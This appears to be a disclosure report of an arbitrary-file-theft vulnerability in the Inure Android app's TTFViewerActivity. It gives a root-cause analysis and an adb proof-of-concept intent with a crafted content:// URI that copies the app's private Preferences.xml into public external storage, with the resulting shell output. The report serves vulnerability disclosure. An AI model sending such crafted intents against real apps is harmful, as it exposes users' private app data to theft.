Theft of Arbitrary Files due to lack of intent validation and insecure usage of provider paths in TTFViewerActivity.kt in hamza417/inure
Reported on
Aug 24th 2023
Description
Through the use of Oversecured, leading vulnerability scanner for Android and iOS applications, we were able to detect an Theft of Arbitrary Files vulnerability within TTFViewerActivity.kt. Check full issue definition in the image below:
Root Cause Analysis
The TTFViewerActivity failed to adequately validate the incoming intent.data prior to forwarding it to the openInputStream function, creating a potential vulnerability for accessing arbitrary files. For instance, an opportunity existed to utilize content:// data using the Inure application's file provider scheme, thereby enabling the extraction of files from its internal directory.
Extraction of the opened files was facilitated by their storage in a directory that was publicly accessible. This was due to the fact that the activity utilized context.getExternalFilesDir to save the files in that location.
This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:
Proof of Concept
Access your device shell using adb shell then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache in order to examine the contents of the directory. For now it's empty:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 6
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
Send the following intent:
adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"
Review the font_cache directory again and notice that the Preference.xml was saved:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 10
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<boolean name="dont_show_again" value="true" />
<int name="main_app_launch_count" value="13" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<int name="notes_list_type" value="0" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<long name="crash_timestamp" value="-1" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $
Impact
An application's internal directory and the files within it should never be accessible by other applications within a device. The vulnerability reported demonstrates that it is possible for malicious third-party applications to steal data belonging to the Inure app's private directory and access it through a publicly available external storage directory through sending a crafted intent to TTFViewerActivity.
References
